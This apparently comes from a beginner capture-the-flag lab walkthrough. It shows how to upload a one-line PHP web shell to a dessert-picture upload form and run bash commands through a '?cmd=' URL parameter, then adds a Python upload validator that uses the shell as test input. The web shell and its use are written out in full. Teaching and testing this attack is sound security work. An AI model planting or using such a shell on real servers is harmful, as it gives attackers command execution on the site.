Summer of Cyber


Dessert Database File Upload Exploitation

This page will help you learn how Alice and Bob’s dessert database works, and then help you hack into it just like those L33k3rs did!

USA Cake

Let’s Begin

First, let’s begin by going to the database itself…

DATABASE

Here you will see the option to upload a picture of your favorite dessert!

Go ahead, find a picture of your favorite dessert, download it to your computer, then upload it!

Cool right?

Now here is the part that Alice and Bob want you to pay close attention to…

Exploit

We want you to download this file below…

Hacky File

The contents of this file are the following

<? print_r(system($_GET['cmd'])); ?>

This one line is not a picture at all, it is PHP. Because the database saves the file with its original .php name in a folder the web server treats as code, the server runs it as a script. PHP’s system() takes whatever is in the cmd part of the URL, hands it to the server’s shell, and sends the output back to your browser. In other words, it lets us inject (enter) bash commands through the URL. The bash commands you can type are the same ones you learned yesterday in the bash tutorial! (One detail for later: the short `<?` opening tag only works when the server has PHP’s short_open_tag setting turned on; `<?php` always works.)

These bash commands can do all kinds of malicious things, such as list every file the website contains, delete files, etc. So the L33k3rs must have used bash commands like these to put the pictures of leeks all over our database!

But we won’t be deleting files, because we are not the L33k3rs!

Now that you know what the file we just downloaded does, upload it just as you did with your dessert image.

Once you do that, you will be directed to a page that says

We got your cake image: /cakes/Hack.php

With a little image underneath (that “image” is really our uploaded Hack.php, which the page is trying to show as a picture).

Right-click on this image and select “Open Image in New Tab”.

Once the new tab opens, click in the address bar and add this to the very end of the URL…

?cmd=ls

Hit Enter, and now you see a list of the files in the website folder where Hack.php was stored (/cakes/)! Crazy, right!

The command that gets executed is whatever comes right after the =, so, as we learned in the bash tutorial, ls lists the contents of the current directory. If a command has spaces in it, replace each space with a + (or %20) so it fits in the URL. Now, find the flag!

You are truly becoming an expert!
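Why did the upload work at all? The reply “We got your cake image: /cakes/Hack.php” shows that Alice and Bob’s database kept our file name, kept the .php extension, and dropped the file into a folder the web server runs code from. The checks below are an added example of what a safe upload handler does instead; they are not the lab’s code, and the storage directory, size limit and sample files are my own assumptions and constructed test data. The point is that the user-supplied name is never used and the stored file is always a server-chosen image name.

```python
"""Added example: the checks a safe version of the dessert upload handler
would make before accepting a file. Not the lab's own code.

Assumptions (mine): uploads go under UPLOAD_DIR, a directory the web server
serves as static files and never executes, and only PNG/JPEG/GIF are wanted.
"""
import os
import secrets

# Real image files begin with these fixed bytes ("magic numbers").
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

UPLOAD_DIR = "/var/app/uploads"   # assumed: no PHP handler for this directory
MAX_BYTES = 5 * 1024 * 1024       # assumed size limit


def sniff_image_type(data: bytes):
    """Decide the type from the CONTENT, returning 'png'/'jpg'/'gif' or None."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def safe_stored_name(data: bytes) -> str:
    """Server-chosen name: random token + extension derived from the content.
    The user-supplied name (e.g. Hack.php) is never used, so there is nothing
    for the server to mistake for a script."""
    kind = sniff_image_type(data)
    if kind is None:
        raise ValueError("not a PNG, JPEG or GIF image")
    return f"{secrets.token_hex(16)}.{kind}"


def validate_upload(user_filename: str, data: bytes):
    """Return (accepted, reason_or_stored_path).

    Three independent checks. The tutorial's web shell fails the extension
    check; renaming it to cake.png still fails the content check; and even a
    PHP payload hidden inside a genuine image would be stored under a random
    .png/.jpg/.gif name in a directory that never executes code."""
    if len(data) > MAX_BYTES:
        return False, "file too large"
    ext = os.path.splitext(user_filename)[1].lower()
    if ext not in {".png", ".jpg", ".jpeg", ".gif"}:
        return False, f"extension {ext or '(none)'} not allowed"
    if sniff_image_type(data) is None:
        return False, "content is not an image"
    return True, os.path.join(UPLOAD_DIR, safe_stored_name(data))


# Constructed sample inputs for the demo.
WEBSHELL = b"<? print_r(system($_GET['cmd'])); ?>"
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32   # header only, enough to sniff


if __name__ == "__main__":
    for name, data in [("Hack.php", WEBSHELL), ("cake.png", WEBSHELL),
                       ("cake.png.php", FAKE_PNG), ("cake.png", FAKE_PNG)]:
        print(f"{name:14} -> {validate_upload(name, data)}")
```

Note that the extension check alone would not have stopped a file named cake.png that contains PHP; it is the combination of content sniffing, a server-chosen name, and a storage directory with no script handler that closes the hole the walkthrough exploits.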